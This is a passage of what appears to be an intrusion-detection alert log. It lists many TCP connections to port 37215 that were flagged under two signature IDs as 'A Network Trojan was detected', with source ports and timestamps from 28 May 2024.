            SID:2829579
            Source Port:56550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.591666
            SID:2829579
            Source Port:43848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847798
            SID:2829579
            Source Port:51772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816783
            SID:2835222
            Source Port:34442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849688
            SID:2835222
            Source Port:49608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707695
            SID:2829579
            Source Port:40438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.073321
            SID:2829579
            Source Port:37388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.742034
            SID:2829579
            Source Port:48056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928252
            SID:2835222
            Source Port:55546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.076771
            SID:2829579
            Source Port:57624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.812010
            SID:2835222
            Source Port:47112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808561
            SID:2829579
            Source Port:54336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855668
            SID:2829579
            Source Port:35150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930130
            SID:2835222
            Source Port:44582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318145
            SID:2835222
            Source Port:52278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.520816
            SID:2835222
            Source Port:48246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859678
            SID:2829579
            Source Port:38754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861779
            SID:2835222
            Source Port:54058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927540
            SID:2835222
            Source Port:40946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715678
            SID:2835222
            Source Port:49986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084641
            SID:2835222
            Source Port:55544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.738610
            SID:2835222
            Source Port:39856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738328
            SID:2835222
            Source Port:46766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770834
            SID:2835222
            Source Port:47062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605049
            SID:2829579
            Source Port:55262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923243
            SID:2835222
            Source Port:40296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639816
            SID:2829579
            Source Port:58468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728341
            SID:2835222
            Source Port:39526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321280
            SID:2835222
            Source Port:36764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516559
            SID:2835222
            Source Port:39464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552815
            SID:2829579
            Source Port:40200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.072297
            SID:2835222
            Source Port:38550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810747
            SID:2829579
            Source Port:55872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278182
            SID:2835222
            Source Port:36644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994326
            SID:2835222
            Source Port:56638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848454
            SID:2835222
            Source Port:51256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839661
            SID:2829579
            Source Port:52850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670380
            SID:2835222
            Source Port:36188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818373
            SID:2835222
            Source Port:44878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.859546
            SID:2835222
            Source Port:52170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735007
            SID:2829579
            Source Port:33212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443145
            SID:2835222
            Source Port:44414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832334
            SID:2835222
            Source Port:32928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.650418
            SID:2829579
            Source Port:33804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935965
            SID:2829579
            Source Port:44932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.788934
            SID:2829579
            Source Port:37390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.528639
            SID:2835222
            Source Port:59296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048206
            SID:2835222
            Source Port:41268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741737
            SID:2835222
            Source Port:43880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.133889
            SID:2829579
            Source Port:57870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834559
            SID:2829579
            Source Port:42464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.557891
            SID:2835222
            Source Port:45996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348074
            SID:2829579
            Source Port:49478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771433
            SID:2835222
            Source Port:34734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952652
            SID:2829579
            Source Port:37004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994914
            SID:2835222
            Source Port:42260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956929
            SID:2829579
            Source Port:57672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.687510
            SID:2835222
            Source Port:33558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885472
            SID:2835222
            Source Port:57750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681580
            SID:2835222
            Source Port:41528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852722
            SID:2835222
            Source Port:53808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.749795
            SID:2829579
            Source Port:51176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319486
            SID:2835222
            Source Port:59998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453857
            SID:2835222
            Source Port:40190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310718
            SID:2829579
            Source Port:42596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930927
            SID:2829579
            Source Port:32912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972703
            SID:2835222
            Source Port:56090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935136
            SID:2829579
            Source Port:51282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816734
            SID:2835222
            Source Port:59016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927064
            SID:2835222
            Source Port:47974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826066
            SID:2829579
            Source Port:44024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966882
            SID:2829579
            Source Port:47760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924610
            SID:2829579
            Source Port:52908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047528
            SID:2835222
            Source Port:36470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470594
            SID:2829579
            Source Port:40058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376508
            SID:2835222
            Source Port:39484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773607
            SID:2829579
            Source Port:39190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665272
            SID:2835222
            Source Port:40908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.750450
            SID:2829579
            Source Port:35128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760265
            SID:2835222
            Source Port:51942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953597
            SID:2835222
            Source Port:51160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.385461
            SID:2829579
            Source Port:34002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423300
            SID:2829579
            Source Port:49374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.623160
            SID:2829579
            Source Port:53656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782501
            SID:2829579
            Source Port:37012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777918
            SID:2835222
            Source Port:55598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312671
            SID:2829579
            Source Port:42180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052861
            SID:2835222
            Source Port:59656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388757
            SID:2829579
            Source Port:46420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.442698
            SID:2835222
            Source Port:44718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559325
            SID:2835222
            Source Port:35634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849281
            SID:2835222
            Source Port:45196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857595
            SID:2829579
            Source Port:37220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263652
            SID:2835222
            Source Port:49994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856277
            SID:2829579
            Source Port:54056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334127
            SID:2829579
            Source Port:33446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655898
            SID:2835222
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004745
            SID:2829579
            Source Port:43626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930683
            SID:2835222
            Source Port:36342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596818
            SID:2835222
            Source Port:48214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.896875
            SID:2829579
            Source Port:48092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860707
            SID:2829579
            Source Port:35380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648517
            SID:2829579
            Source Port:49486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.011056
            SID:2835222
            Source Port:60262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809170
            SID:2835222
            Source Port:44840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831715
            SID:2829579
            Source Port:45746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597284
            SID:2829579
            Source Port:50644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358903
            SID:2835222
            Source Port:41798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826486
            SID:2835222
            Source Port:44228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848854
            SID:2835222
            Source Port:60814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881324
            SID:2835222
            Source Port:56684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026494
            SID:2829579
            Source Port:44404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756750
            SID:2829579
            Source Port:55526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757414
            SID:2835222
            Source Port:54356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275410
            SID:2829579
            Source Port:53970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.025232
            SID:2835222
            Source Port:42300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810199
            SID:2829579
            Source Port:53648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855248
            SID:2835222
            Source Port:58840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927119
            SID:2829579
            Source Port:51036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862107
            SID:2835222
            Source Port:41854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299655
            SID:2835222
            Source Port:34090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896096
            SID:2835222
            Source Port:41082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542643
            SID:2835222
            Source Port:58368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985280
            SID:2835222
            Source Port:37220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856266
            SID:2835222
            Source Port:48646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840934
            SID:2835222
            Source Port:38844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180774
            SID:2835222
            Source Port:52958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279826
            SID:2829579
            Source Port:52948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333299
            SID:2835222
            Source Port:36784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869497
            SID:2829579
            Source Port:37498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048624
            SID:2835222
            Source Port:54650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934139
            SID:2835222
            Source Port:54848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572062
            SID:2835222
            Source Port:52206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321095
            SID:2829579
            Source Port:52128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739966
            SID:2835222
            Source Port:47618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067223
            SID:2829579
            Source Port:34020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807769
            SID:2829579
            Source Port:47902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849560
            SID:2835222
            Source Port:44350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.898979
            SID:2829579
            Source Port:52498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953614
            SID:2835222
            Source Port:45292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049220
            SID:2829579
            Source Port:52452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916753
            SID:2829579
            Source Port:39760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563291
            SID:2829579
            Source Port:42828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.912823
            SID:2829579
            Source Port:47342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.385507
            SID:2835222
            Source Port:57074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.356721
            SID:2829579
            Source Port:56262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783705
            SID:2835222
            Source Port:57902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597391
            SID:2835222
            Source Port:53328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273383
            SID:2829579
            Source Port:51018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954054
            SID:2829579
            Source Port:54978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995826
            SID:2829579
            Source Port:46762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.744402
            SID:2829579
            Source Port:42188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059828
            SID:2835222
            Source Port:32960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721095
            SID:2829579
            Source Port:46278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.958457
            SID:2829579
            Source Port:40982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553006
            SID:2835222
            Source Port:41160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807988
            SID:2829579
            Source Port:33552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553063
            SID:2835222
            Source Port:54496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.817567
            SID:2829579
            Source Port:44294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908990
            SID:2835222
            Source Port:51394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842822
            SID:2829579
            Source Port:59680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863033
            SID:2835222
            Source Port:38612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679841
            SID:2835222
            Source Port:38430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765974
            SID:2835222
            Source Port:35914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727728
            SID:2835222
            Source Port:43222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158420
            SID:2835222
            Source Port:51878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735519
            SID:2829579
            Source Port:60002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.381758
            SID:2835222
            Source Port:55196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941730
            SID:2829579
            Source Port:53958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563316
            SID:2829579
            Source Port:56054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.443496
            SID:2835222
            Source Port:60570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.308272
            SID:2835222
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883335
            SID:2835222
            Source Port:59312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.426806
            SID:2835222
            Source Port:60696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676559
            SID:2829579
            Source Port:41816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999004
            SID:2835222
            Source Port:60106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863177
            SID:2829579
            Source Port:35780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809044
            SID:2835222
            Source Port:43556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716697
            SID:2835222
            Source Port:55750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.367194
            SID:2835222
            Source Port:41542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867423
            SID:2835222
            Source Port:49594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957235
            SID:2835222
            Source Port:50496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899890
            SID:2835222
            Source Port:37628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849391
            SID:2829579
            Source Port:59558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846942
            SID:2829579
            Source Port:39396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374341
            SID:2829579
            Source Port:60476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862269
            SID:2835222
            Source Port:43396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412855
            SID:2829579
            Source Port:58580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436580
            SID:2829579
            Source Port:60694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065950
            SID:2835222
            Source Port:36616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752906
            SID:2829579
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014729
            SID:2835222
            Source Port:33688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014633
            SID:2829579
            Source Port:48384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067891
            SID:2829579
            Source Port:57966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842781
            SID:2829579
            Source Port:33308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326778
            SID:2829579
            Source Port:49526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432625
            SID:2835222
            Source Port:44232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436709
            SID:2835222
            Source Port:49298
            Destination Port:37215
